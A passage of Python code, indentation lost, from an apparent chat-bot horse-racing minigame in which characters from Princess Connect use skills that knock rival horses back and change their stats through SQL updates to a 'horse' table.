target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - def_fix)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "纯":
response = "%s号马%s的%s使用了【地狱之盾】!自己的双防提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
sql = "update horse set current_tp = 0, def = 6, sdef = 9 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "静流":
response = "%s号马%s的%s使用了【神圣惩处】!自己的物防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "毛二力":
response = "%s号马%s的%s使用了【紫电一闪】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 6, tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "姬塔":
response = "%s号马%s的%s使用了【暴风雨之剑】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "亚里莎":
response = "%s号马%s的%s使用了【我的箭将把你贯穿】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "哈哈剑":
response = "%s号马%s的%s使用了【高贵谴击】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 4
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "宫子":
response = "%s号马%s的%s使用了【把你变成布丁呦】!向前冲了一步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "茜里":
response = "%s号马%s的%s使用了【甜蜜恶魔的声援】!魔法攻击上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
response += "自己向前冲了%s步\n" % move
position = min(10, horse[3] + move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, position = %s, satk = 8 where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "雪哥":
response = "%s号马%s的%s使用了【臣服在我的美之下吧】!其它角色的双防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - 1)
target_sdef = max(0, target_horse[8] - 1)
sql = "update horse set position = %s, def = %s, sdef = %s where id = %s" % (target_position, target_def, target_sdef, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "玲奈":
response = "%s号马%s的%s使用了【心碎】!造成了暴击!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
move = round(move * 1.5)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "香织":
response = "%s号马%s的%s使用了【琉球犬重拳出击】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 4
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "美美":
response = "%s号马%s的%s使用了【兔兔斩击】!攻击上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.search_horse_by_position(1)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
target_horse = await self.search_horse_by_position(2)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "铃":
response = "%s号马%s的%s使用了【尝尝亲手烘焙的红豆包】!自己的魔防上升了!自己的攻击上升了!向前冲了1步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, atk = 7, sdef = 8, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "惠鲤子":
response = "%s号马%s的%s使用了【致命惩罚】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
attack_fix = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
if move >= 2:
attack_fix = 4
response += '%s的攻击力大幅上升了!' % horse[1]
response += '\n'
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = atk + %s where id = %s" % (attack_fix, horse[0])
cursor.execute(sql)
elif horse[1] == "忍":
response = "%s号马%s的%s使用了【亡灵叙述者】!其它角色的物防下降了!自己的攻击上升了!双防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - 1)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8, def = 5, sdef = 4 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "真阳":
response = "%s号马%s的%s使用了【伊丽莎白】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
damage_fix = -1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s的奶牛鸽了\n" % horse[1]
else:
response += "奶牛把%s号马%s的%s击退了%s步。\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "栞":
response = "%s号马%s的%s使用了【附魔箭矢】!攻击力上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = atk + 1 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "千歌":
response = "%s号马%s的%s使用了【精灵庇护】!向前冲了一步!其它角色的物攻下降了!自己的魔攻上升了!自己的双防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
sql = "update horse set atk = atk - 1 where id = %s" % target_horse[0]
cursor.execute(sql)
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, position = %s, satk = 7, def = 4, sdef = 4 where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "空花":
response = "%s号马%s的%s使用了【神魂颠倒】!自己的双防上升了!向前冲了2步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 2)
sql = "update horse set current_tp = 0, def = 5, sdef = 13, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "珠希":
response = "%s号马%s的%s使用了【猫猫决胜爪】!目标的tp减少了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
target_tp = target_horse[4]
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
target_tp = max(0, target_tp - 20)
if target_horse[6] > 0:
move = move * 2
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s, current_tp = %s where id = %s" % (target_position, target_tp, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "子龙":
response = "%s号马%s的%s使用了【飞跃枪闪】!自己的物防提升了!自己的物攻提升了!自己的tp上升提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = atk + 1, def = 8, tp = tp + 1 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "深月":
response = "%s号马%s的%s使用了【血色蔷薇】!其它角色的物防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
position_fix = 0
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
if move >= 2:
response += "自己向前冲了一步!\n"
position_fix += 1
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - 2)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
position = min(10, horse[3] + position_fix)
sql = "update horse set current_tp = 0, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "绫音":
response = "%s号马%s的%s使用了【噗吉全力挥动】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
if target_horse[0] != horse[0]:
response += "把%s号马%s的%s吹飞了一步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1])
move += 1
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "美里":
response = "%s号马%s的%s使用了【姐妹互助】!向前冲了一步!自己的魔攻上升了!自己的魔防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
sql = "update horse set atk = atk - 1 where id = %s" % target_horse[0]
cursor.execute(sql)
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, position = %s, satk = 8, def = 3, sdef = 5 where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "伊莉雅":
response = "%s号马%s的%s使用了【朱色之瞳】!自己的魔攻上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
horse_list = await self.search_horse()
for target_horse in horse_list:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, satk = 9 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "羊驼":
response = "%s号马%s的%s使用了【毛绒绒挥击】!自己的物防上升了!\n" % (
horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 6, def = 13, tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "美咲":
response = "%s号马%s的%s使用了【特洛伊之眼】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
target_horse = await self.get_single_target(horse)
target_tp = target_horse[4]
if target_horse[0] != horse[0]:
target_tp = max(0, target_tp - 20)
sql = "update horse set current_tp = %s where id = %s" % (target_tp, target_horse[0])
cursor.execute(sql)
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
damage_fix = -3
move = calculate_damage(horse[6], target_horse[8], damage_fix) \
+ calculate_damage(horse[6], target_horse[8], damage_fix) \
+ calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "香菜":
response = "%s号马%s的%s使用了【蔓藤旋舞】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
move_toxic = calculate_damage(5, target_horse[8], damage_fix)
if move + move_toxic == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步,毒退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move, move_toxic)
target_position = max(1, target_horse[3] - move - move_toxic)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "由加莉":
response = "%s号马%s的%s使用了【七重纱护】!自己的魔防上升了!tp中度恢复了!向前冲了1步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 40, sdef = 7, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "铃莓":
success = random.randint(1, 3)
response = "%s号马%s的%s使用了【狂风气流卷】!其它角色的物防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
if success == 1:
response += '大成功!伤害和减甲效果都得到了提升!\n'
damage_fix = 4
def_fix = 2
else:
response += '失败了……无事发生……\n'
damage_fix = 0
def_fix = 1
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - def_fix)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "依里":
response = "%s号马%s的%s使用了【闪电标枪】!退后了1步!自己的魔攻上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
damage_fix = 0
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
position = max(1, horse[3] - 1)
sql = "update horse set current_tp = 0, satk = 10, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "胡桃":
response = "%s号马%s的%s使用了【惊吓摇铃】!自己的双防提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
target_tp = target_horse[4]
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
target_tp = max(0, target_tp - 20)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s, current_tp = %s where id = %s" % (target_position, target_tp, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 5, sdef = 6 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "未奏希":
damage_fix = 0
response = "%s号马%s的%s使用了【捣蛋轰炸机】!自己的物攻上升了!其它角色的物攻下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s, atk = atk - 1 where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "怜":
damage_fix = 1
response = "%s号马%s的%s使用了【无敌斩】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
horse_num = len(horse_list)
for i in range(3):
target_id = random.randint(1, horse_num) - 1
target_horse = horse_list[target_id]
while target_horse[0] == horse[0]:
target_id = random.randint(1, horse_num) - 1
target_horse = horse_list[target_id]
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "日和莉":
response = "%s号马%s的%s使用了【日和突击】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
damage_fix = -3
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "优衣":
response = "%s号马%s的%s使用了【花瓣射击】!自己的物防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if target_horse[1] in ('真琴', '香织', '真步', '羊驼', '栞', '铃', '真阳', '珠希', '凯露', '日和莉'):
response += '对兽人造成了额外伤害!'
move += 1
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 3 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "佩可莉姆":
response = "%s号马%s的%s使用了【公主突袭】!自己的双防提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 3
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 6, sdef = 7 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "可可萝":
response = "%s号马%s的%s使用了【极光】!自己的物攻提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "凯露":
response = "%s号马%s的%s使用了【换头】!目标的双防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = list(await self.search_horse())
random.shuffle(horse_list)
change_horse = horse
for target_horse in horse_list:
if target_horse[0] != horse[0] and target_horse[3] >= change_horse[3]:
change_horse = target_horse
if change_horse[0] != horse[0]:
response += "和%s号马%s的%s换位了!\n" % (
change_horse[0], await get_nick_name(group_id, change_horse[2]), change_horse[1])
sql = "update horse set def = def - 1, sdef = sdef - 1, position = %s where id = %s" % (horse[3], change_horse[0])
cursor.execute(sql)
else:
response += "%s鸽了\n" % horse[1]
sql = "update horse set current_tp = 0, position = %s where id = %s" % (change_horse[3], horse[0])
cursor.execute(sql)
else:
response = "%s号马%s的%s使用了【白板ub】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(max(horse[6], horse[5]), target_horse[7], damage_fix)
if move == 0:
